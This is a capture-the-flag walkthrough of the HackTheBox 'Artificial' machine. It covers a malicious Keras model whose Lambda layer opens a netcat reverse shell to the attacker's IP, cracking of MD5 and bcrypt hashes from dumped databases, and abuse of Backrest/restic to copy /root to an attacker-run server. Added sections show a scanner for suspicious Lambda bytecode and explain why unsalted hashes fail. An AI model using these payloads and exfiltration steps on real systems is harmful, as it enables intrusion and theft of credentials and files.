
HTB-Artificial

HTB-Machine Hackthebox Linux
Author: HYH
A technical enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and keeps learning and growing.

Nmap

[root@kali] /home/kali/Artificial  
❯ nmap Artificial.htb -sV -A

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_  256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Artificial - AI Solutions
|_http-server-header: nginx/1.18.0 (Ubuntu)

TensorFlow RCE

Register any user, go to the upload page, and grab the requirement.txt and Dockerfile the site hands out:

// dockerfile
FROM python:3.8-slim

WORKDIR /code

RUN apt-get update && \
    apt-get install -y curl && \
    curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm -rf /var/lib/apt/lists/*

RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl

ENTRYPOINT ["/bin/bash"]

// requirement.txt
tensorflow-cpu==2.13.1

Build your environment from the supplied Dockerfile if at all possible, otherwise the reverse shell may never come back. The reason is that Keras serialises a Lambda layer's function as marshalled Python bytecode inside the .h5 file, and marshal output is tied to the interpreter version, so the payload must be generated with the same Python (3.8) and tensorflow-cpu (2.13.1) that the server loads it with.

[root@kali] /home/kali/Artificial  
❯ docker build -t my-tf-image .
[+] Building 63.8s (8/8) FINISHED                                                                                                docker:default
 => [internal] load build definition from Dockerfile                                                                                       0.0s
 => => transferring dockerfile: 540B                                                                                                       0.0s 
 => [internal] load metadata for docker.io/library/python:3.8-slim                                                                        15.0s 
 => [internal] load .dockerignore                                                                                                          0.0s
 => => transferring context: 2B                                                                                                            0.0s 
 => [1/4] FROM docker.io/library/python:3.8-slim@sha256:1d52838af602b4b5a831beb13a0e4d073280665ea7be7f69ce2382f29c5a613f                   0.0s 
 => CACHED [2/4] WORKDIR /code                                                                                                             0.0s 
 => CACHED [3/4] RUN apt-get update &&     apt-get install -y curl &&     curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090  0.0s 
 => [4/4] RUN pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl -i https://pypi.mirrors.ustc.  43.3s 
 => exporting to image                                                                                                                     5.5s 
 => => exporting layers                                                                                                                    5.5s 
 => => writing image sha256:3ce3493863cf4d877a17cb49f6153636af12fdd54a2b3ed3623e5d933ff8abff                                               0.0s 
 => => naming to docker.io/library/my-tf-image                                                                                             0.0s 

The payload follows this article 👇

import tensorflow as tf

# Runs when the Lambda layer is *called*, i.e. when the server runs a prediction
# on the uploaded model, not merely when the file is loaded. Keras stores this
# function as marshalled bytecode, so generate the file on Python 3.8 / TF 2.13.1
# to match the target.
def exploit(x):
    import os
    # Named-pipe reverse shell back to the attacker's listener (10.10.16.47:6666)
    os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.47 6666 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))   # the Lambda layer carries the bytecode
model.compile()
model.save("exploit.h5")                     # legacy HDF5 format, which the upload page accepts

Start a listener first (nc -lvnp 6666), upload the file, then click View Predictions: the prediction calls the Lambda layer and the reverse shell comes back.
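The attack works because Keras writes the Lambda function into the model_config JSON as base64-encoded marshal bytecode and rebuilds a Python function from it when the layer runs. The following added example (not part of the original write-up or of Keras) shows the defensive side of that: it unmarshals the code object of every Lambda layer without constructing or calling a function and reports the global names and string constants the bytecode touches, which is enough to spot an os.system payload before the model is ever loaded. The sample config is constructed inline to mimic what Keras writes for the exploit model above; scan_h5 assumes h5py is installed on the analysis host and is the only part that touches a real file.

```python
import base64
import json
import marshal

# Names whose presence in a Lambda layer's bytecode warrants a closer look.
SUSPICIOUS_NAMES = {"os", "system", "popen", "subprocess", "socket",
                    "eval", "exec", "__import__", "builtins"}


def func_dump(func):
    """Serialise a function the way Keras's generic_utils.func_dump does:
    marshal the code object, then base64 it. marshal output is tied to the
    interpreter version, which is why the exploit has to be built on the
    same Python/TensorFlow as the target."""
    raw = marshal.dumps(func.__code__)
    return [base64.b64encode(raw).decode("ascii"), func.__defaults__, None]


def scan_model_config(config_json):
    """Walk the model_config JSON (root attribute of a Keras .h5 file) and,
    for every Lambda layer, unmarshal its code object WITHOUT turning it
    into a function, then report the names and strings the bytecode uses."""
    cfg = json.loads(config_json)
    findings = []
    for layer in cfg["config"]["layers"]:
        if layer["class_name"] != "Lambda":
            continue
        function = layer["config"]["function"]
        # Keras stores [code_b64, defaults, closure]; only the code matters here.
        code = marshal.loads(base64.b64decode(function[0]))
        names = set(code.co_names)
        strings = {c for c in code.co_consts if isinstance(c, str)}
        findings.append({
            "layer": layer["config"]["name"],
            "names": sorted(names),
            "strings": sorted(strings),
            "suspicious": sorted(names & SUSPICIOUS_NAMES),
        })
    return findings


def scan_h5(path):
    """Same check against a real .h5 file (assumption: h5py is installed)."""
    import h5py
    with h5py.File(path, "r") as f:
        cfg = f.attrs["model_config"]
    if isinstance(cfg, bytes):
        cfg = cfg.decode("utf-8")
    return scan_model_config(cfg)


# --- constructed sample: mimics the config Keras writes for the exploit model ---
def exploit(x):  # never called here; only its code object is serialised
    import os
    os.system("id")
    return x


SAMPLE_CONFIG = json.dumps({
    "class_name": "Sequential",
    "config": {
        "name": "sequential",
        "layers": [
            {"class_name": "InputLayer",
             "config": {"name": "input_1", "batch_input_shape": [None, 64]}},
            {"class_name": "Lambda",
             "config": {"name": "lambda", "function": func_dump(exploit),
                        "function_type": "lambda"}},
        ],
    },
})

if __name__ == "__main__":
    for finding in scan_model_config(SAMPLE_CONFIG):
        print(finding)
```

Run the scanner on uploaded models before they reach tf.keras.models.load_model; the practical fix on the application side is to refuse Lambda layers outright (or load with the non-legacy format and no custom objects), since any Lambda layer is arbitrary code by construction.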

Own gael

The app's instance directory holds a users.db SQLite database with the user table; the 32-hex-character values are unsalted MD5 hashes:

app@artificial:~/app/instance$ sqlite3 users.db 

Enter ".help" for usage hints.
sqlite> select * from user;
1|gael|gael@artificial.htb|c99175974b6e192936d97224638a34f8
2|mark|mark@artificial.htb|0f3d8c76530022670f1c6029eed09ccb
3|robert|robert@artificial.htb|b606c5f5136170f15444251665638b36
4|royer|royer@artificial.htb|bc25b1f80f544c0ab451c02a3dca9fc6
5|mary|mary@artificial.htb|bf041041e57f1aff3be7ea1abd6129d0
6|notthei0204|notthei0204@gmail.com|f0f1f60430a59e920764a7b1be6041fc
7|test123@gmail.com|test123@gmail.com|9a93efa79aa9f5d35e14bc55a3e16dc4
8|n|n@n.com|7b8b965ad4bca0e41ab51de7b31363a1
9|test|test@email.com|098f6bcd4621d373cade4e832627b4f6
10|dd|dd@gmail.com|827ccb0eea8a706c4c34a16891f84e7b
11|ddd|ddd@gmail.com|77963b7a931377ad4ab5ad6a9cd718aa

Crack gael's hash with john as Raw-MD5:

[root@kali] /home/kali/Artificial  
❯ cat hash.txt  
c99175974b6e192936d97224638a34f8

[root@kali] /home/kali/Artificial  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-md5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
mattp005numbertwo (?)     
1g 0:00:00:00 DONE (2025-06-23 04:46) 3.448g/s 19728Kp/s 19728Kc/s 19728KC/s mattpapa..mattne
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 
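Raw MD5 falls so fast (john reports about 20 M candidates per second above) because nothing is salted: one hash per candidate word is compared against every user at once. The added example below, which is not part of the original write-up, shows that property with a stdlib-only dictionary attack over four rows copied from the users.db dump; the wordlist is a constructed stand-in for rockyou.txt containing the candidates needed to hit those rows.

```python
import hashlib

# Rows copied from the users.db dump on the box (id|username|email|md5).
USERS_DB_ROWS = """\
1|gael|gael@artificial.htb|c99175974b6e192936d97224638a34f8
8|n|n@n.com|7b8b965ad4bca0e41ab51de7b31363a1
9|test|test@email.com|098f6bcd4621d373cade4e832627b4f6
10|dd|dd@gmail.com|827ccb0eea8a706c4c34a16891f84e7b
"""

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "12345", "test", "n", "letmein",
            "mattp005numbertwo"]


def parse_rows(dump):
    """Turn the sqlite 'select * from user' output into {username: md5hex}."""
    users = {}
    for line in dump.splitlines():
        if not line.strip():
            continue
        _id, name, _email, digest = line.split("|")
        users[name] = digest.lower()
    return users


def crack_raw_md5(users, wordlist):
    """Hash each candidate once and look every user up in the result: with no
    salt, the cost of the attack does not grow with the number of users."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {name: table[h] for name, h in users.items() if h in table}


if __name__ == "__main__":
    for name, password in crack_raw_md5(parse_rows(USERS_DB_ROWS), WORDLIST).items():
        print(f"{name}: {password}")
```

The same lookup table also exposes users who share a password, since their hashes are identical; a per-user salt (or better, bcrypt/argon2 as in the next section) removes both shortcuts.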

Root

The /opt directory gives a clue, and the backup itself turns up in /var/backups:

gael@artificial:/var/backups$ ls -al
total 51228
drwxr-xr-x  2 root root       4096 Jun  9 09:03 .
drwxr-xr-x 13 root root       4096 Jun  2 07:38 ..
-rw-r--r--  1 root root      39386 Jun  9 09:02 apt.extended_states.0
-rw-r--r--  1 root root       4206 Jun  2 07:42 apt.extended_states.1.gz
-rw-r--r--  1 root root       4190 May 27 13:07 apt.extended_states.2.gz
-rw-r--r--  1 root root       4383 Oct 27  2024 apt.extended_states.3.gz
-rw-r--r--  1 root root       4379 Oct 19  2024 apt.extended_states.4.gz
-rw-r--r--  1 root root       4367 Oct 14  2024 apt.extended_states.5.gz
-rw-r--r--  1 root root       4356 Sep 22  2024 apt.extended_states.6.gz
-rw-r-----  1 root sysadm 52357120 Mar  4 22:19 backrest_backup.tar.gz
gael@artificial:/var/backups$ id
uid=1000(gael) gid=1000(gael) groups=1000(gael),1007(sysadm)
gael@artificial:/var/backups$ 

gael is in the sysadm group, so the archive is readable. Copy it to the attack box and unpack it; the Backrest config inside contains a password hash:

[root@kali] /home/kali/Artificial/backrest/.config/backrest  
 cat config.json 
{
  "modno": 2,
  "version": 4,
  "instance": "Artificial",
  "auth": {
    "disabled": false,
    "users": [
      {
        "name": "backrest_root",
        "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
      }
    ]
  }
}

Although the field is called passwordBcrypt, the value is stored base64-encoded, so decode it once (base64 is an encoding, not encryption) to get the actual bcrypt string:

[root@kali] /home/kali/Artificial  
❯ cat hash.txt| base64 -d                                   
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO

Crack it with john again, this time as bcrypt (cost 10, i.e. 2^10 = 1024 iterations, which is why throughput drops from millions to a few hundred candidates per second):

[root@kali] /home/kali/Artificial  
❯ cat hash.txt 
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO

[root@kali] /home/kali/Artificial  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt   
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^           (?)     
1g 0:00:00:15 DONE (2025-06-23 05:01) 0.06544g/s 353.4p/s 353.4c/s 353.4C/s lightbulb..huevos
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

ss shows port 9898 listening on localhost only (Backrest's web UI); forward it out over SSH with gael's credentials:

gael@artificial:~$ ss -tuln
Netid         State          Recv-Q         Send-Q                 Local Address:Port                 Peer Address:Port         Process         
udp           UNCONN         0              0                      127.0.0.53%lo:53                        0.0.0.0:*                            
tcp           LISTEN         0              2048                       127.0.0.1:5000                      0.0.0.0:*                            
tcp           LISTEN         0              4096                       127.0.0.1:9898                      0.0.0.0:*                            
tcp           LISTEN         0              511                          0.0.0.0:80                        0.0.0.0:*                            
tcp           LISTEN         0              4096                   127.0.0.53%lo:53                        0.0.0.0:*                            
tcp           LISTEN         0              128                          0.0.0.0:22                        0.0.0.0:*                            
tcp           LISTEN         0              511                             [::]:80                           [::]:*                            
tcp           LISTEN         0              128                             [::]:22                           [::]:*      

[root@kali] /home/kali/Artificial  
❯ ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898

Log in at http://127.0.0.1:9898 as backrest_root with the cracked password.

Backrest runs restic as root, so creating a repository and running restic commands through it gives root-level file access.
The technique is documented at restic | GTFOBins.

First start a restic REST server on Kali (no authentication, listening on 12345), then back up from the target into it:

[root@kali] /home/kali/Artificial/rest-server_0.14.0_linux_amd64  
❯ ./rest-server --path /tmp/restic-data --listen :12345 --no-auth

Data directory: /tmp/restic-data
Authentication disabled
Append only mode disabled
Private repositories disabled
Group accessible repos disabled
start server on [::]:12345
Creating repository directories in /tmp/restic-data/myrepo

Then run these restic arguments through Backrest. init asks for a repository password; remember it, because restic will ask for it again when you open the repository on Kali.

// init repo
-r rest:http://10.10.16.47:12345/myrepo init

// backup /root to remote
 -r rest:http://10.10.16.47:12345/myrepo backup /root

List the snapshot that landed on Kali:

[root@kali] /tmp/restic-data/myrepo  
❯ restic -r /tmp/restic-data/myrepo snapshots
enter password for repository: 
repository 4235bb1f opened (version 2, compression level auto)
created new cache in /root/.cache/restic
ID        Time                 Host        Tags        Paths  Size
-----------------------------------------------------------------------
b3112b8a  2025-06-23 05:17:15  artificial              /root  4.299 MiB
-----------------------------------------------------------------------
1 snapshots

Restore the snapshot:

[root@kali] /tmp/restic-data/myrepo  
❯ restic -r /tmp/restic-data/myrepo restore b3112b8a --target ./restore
enter password for repository: 
repository 4235bb1f opened (version 2, compression level auto)
[0:00] 100.00%  1 / 1 index files loaded
restoring snapshot b3112b8a of [/root] at 2025-06-23 09:17:15.090371306 +0000 UTC by root@artificial to ./restore
Summary: Restored 80 files/dirs (4.299 MiB) in 0:00

root.txt is in the restored tree:

[root@kali] /tmp/restic-data/myrepo/restore/root  
❯ ls -al
total 12
drwx------ 6 root root  220 Jun 23 05:10 .
drwx------ 3 root root   60 Jun 23 05:43 ..
lrwxrwxrwx 1 root root    9 Jun  9 05:37 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x 3 root root   80 Mar  3 16:52 .cache
drwxr-xr-x 3 root root   60 Oct 18  2024 .local
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
lrwxrwxrwx 1 root root    9 Oct 18  2024 .python_history -> /dev/null
-rw-r----- 1 root root   33 Jun 23 04:31 root.txt
drwxr-xr-x 2 root root   80 Jun  9 09:57 scripts
drwx------ 2 root root   80 Mar  4 17:40 .ssh

The restored /root/.ssh/id_rsa also gives a direct login as root (chmod 600 the key first if ssh complains about its permissions):

[root@kali] /tmp/restic-data/myrepo/restore/root/.ssh  
❯ ssh -i ./id_rsa root@Artificial.htb

Summary

User: a straightforward RCE through a malicious Keras model, then cracking an unsalted MD5 password hash. Root: the backup archive yields the Backrest password hash; crack it, forward the port, and use Backrest (running as root) to back up /root to Kali.
